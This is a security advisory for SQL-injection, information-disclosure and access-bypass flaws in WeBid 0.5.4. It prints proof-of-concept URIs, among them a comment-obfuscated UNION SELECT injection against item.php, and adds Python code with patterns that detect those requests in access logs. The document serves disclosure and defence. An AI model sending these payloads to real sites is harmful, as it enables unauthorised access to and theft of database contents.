WeBid Multiple Input Validation Vulnerabilities
BID:30945
Info
| Bugtraq ID: | 30945 |
| Class: | Input Validation Error |
| CVE: | CVE-2008-7118, CVE-2008-7116 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 31 2008 12:00AM |
| Updated: | Jul 05 2016 10:01PM |
| Credit: | Fisher762, Stack |
| Vulnerable: | WeBid WeBid 0.5.4 |
| Not Vulnerable: | |
Discussion
WeBid is prone to multiple input-validation vulnerabilities:
- SQL-injection issues
- an information-disclosure issue
- a security-bypass issue
Exploiting these issues could allow an attacker to obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WeBid 0.5.4 is vulnerable to these issues; other versions may also be affected.
Exploit / POC
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/webid/eledicss.php?nid=0&cd=themes/default&file=style.css
http://www.example.com/webid/logs/cron.log
http://www.example.com/webid/item.php?id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
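The following Python code scans web server access-log lines for requests shaped like the three example URIs above. It is an added example, not part of the original advisory; it assumes common/combined log format and that legitimate `item.php` ids are plain integers, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request target inside a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Closed /*...*/ comments, plus an unterminated trailing /* as in the advisory URI.
SQL_COMMENT_RE = re.compile(r"/\*.*?\*/|/\*.*$", re.S)


def classify(target):
    """Return review findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    query = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    if path.endswith("/eledicss.php") and "file" in query:
        findings.append("eledicss.php file request")
    if path.endswith("/logs/cron.log"):
        findings.append("cron.log fetched over HTTP")
    if path.endswith("/item.php"):
        for value in query.get("id", []):
            if re.fullmatch(r"\d+", value):
                continue  # assumption: legitimate item ids are plain integers
            # Turn comments into spaces so UNION/**/SELECT reads as two keywords.
            flat = SQL_COMMENT_RE.sub(" ", value)
            union = re.search(r"\bunion\s+(?:all\s+)?select\b", flat, re.I)
            findings.append("item.php id: " + ("UNION SELECT" if union else "non-numeric"))
    return findings


def scan(lines):
    """Return (line_number, findings) for each log line with a finding."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits


# Constructed sample log lines; the IPs are documentation addresses.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Sep/2008:10:00:01 +0000] "GET /webid/item.php?id=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Sep/2008:10:00:05 +0000] "GET /webid/item.php?id=-1/**/UNION/**/SELECT/**/1,2,3/* HTTP/1.1" 200 4211',
    '198.51.100.7 - - [01/Sep/2008:10:00:09 +0000] "GET /webid/logs/cron.log HTTP/1.1" 200 880',
    '198.51.100.7 - - [01/Sep/2008:10:00:12 +0000] "GET /webid/eledicss.php?nid=0&cd=themes/default&file=style.css HTTP/1.1" 200 1934',
]
```

`scan(SAMPLE_LOG)` flags lines 2 to 4 and leaves the plain `id=42` request alone. A 200 response on a flagged `logs/cron.log` or `eledicss.php` request is the signal to restrict access to those paths at the web server.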
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].